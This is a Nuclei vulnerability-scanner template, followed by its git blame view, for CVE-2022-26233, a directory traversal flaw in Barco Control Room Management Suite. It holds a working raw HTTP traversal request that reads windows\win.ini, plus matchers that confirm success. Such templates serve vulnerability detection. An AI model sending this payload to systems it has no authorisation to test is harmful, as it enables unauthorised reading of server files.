nuclei-templates/http/cves/2022/CVE-2022-26233.yaml

id: CVE-2022-26233

info:
  name: Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Upgrade Barco Control Room Management Suite to a version higher than 2.9 Build 0275 to mitigate the vulnerability.
  reference:
    - https://0day.today/exploit/37579
    - http://seclists.org/fulldisclosure/2022/Apr/0
    - http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-26233
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-26233
    cwe-id: CWE-22
    epss-score: 0.00654
    epss-percentile: 0.77223
    cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: barco
    product: control_room_management_suite
  tags: cve,cve2022,barco,lfi,seclists,packetstorm

http:
  - raw:
      - |+
        GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4a0a00473045022100daa8547f82c8615b2d03d8541ff37de1f91c24cf042872c4954ab90b80af5a050220345d77954918025528c4ca7435b98169569b646c348d133e3290273d1c16e42d:922c64590222798bb761d5b6d8e72950
Create CVE-2022-26233.yaml 2022-05-05 01:55:44 +00:00			`id: CVE-2022-26233`

			`info:`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00			`name: Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion`
Create CVE-2022-26233.yaml 2022-05-05 01:55:44 +00:00			`author: 0x_Akoko`
			`severity: high`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00			`description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`remediation: \|`
			`Upgrade Barco Control Room Management Suite to a version higher than 2.9 Build 0275 to mitigate the vulnerability.`
Create CVE-2022-26233.yaml 2022-05-05 01:55:44 +00:00			`reference:`
			`- https://0day.today/exploit/37579`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- http://seclists.org/fulldisclosure/2022/Apr/0`
			`- http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2022-26233`
Create CVE-2022-26233.yaml 2022-05-05 01:55:44 +00:00			`classification:`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
Create CVE-2022-26233.yaml 2022-05-05 01:55:44 +00:00			`cvss-score: 7.5`
			`cve-id: CVE-2022-26233`
			`cwe-id: CWE-22`
TemplateMan Update [Mon Nov 27 09:19:41 UTC 2023] :robot: 2023-11-27 09:19:41 +00:00			`epss-score: 0.00654`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`epss-percentile: 0.77223`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`cpe: cpe:2.3:a:barco:control_room_management_suite::::::::`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: barco`
			`product: control_room_management_suite`
			`tags: cve,cve2022,barco,lfi,seclists,packetstorm`
Create CVE-2022-26233.yaml 2022-05-05 01:55:44 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Update and rename CVE-2022-26233.yaml to cves/2022/CVE-2022-26233.yaml 2022-05-07 10:18:02 +00:00			`- raw:`
			`- \|+`
			`GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1`
			`Host: {{Hostname}}`
Create CVE-2022-26233.yaml 2022-05-05 01:55:44 +00:00
Update and rename CVE-2022-26233.yaml to cves/2022/CVE-2022-26233.yaml 2022-05-07 10:18:02 +00:00			`unsafe: true`
Create CVE-2022-26233.yaml 2022-05-05 01:55:44 +00:00			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "bit app support"`
			`- "fonts"`
			`- "extensions"`
			`condition: and`
Auto Template Signing [Sun Jan 14 14:05:19 UTC 2024] :robot: 2024-01-14 14:05:19 +00:00			`# digest: 4a0a00473045022100daa8547f82c8615b2d03d8541ff37de1f91c24cf042872c4954ab90b80af5a050220345d77954918025528c4ca7435b98169569b646c348d133e3290273d1c16e42d:922c64590222798bb761d5b6d8e72950`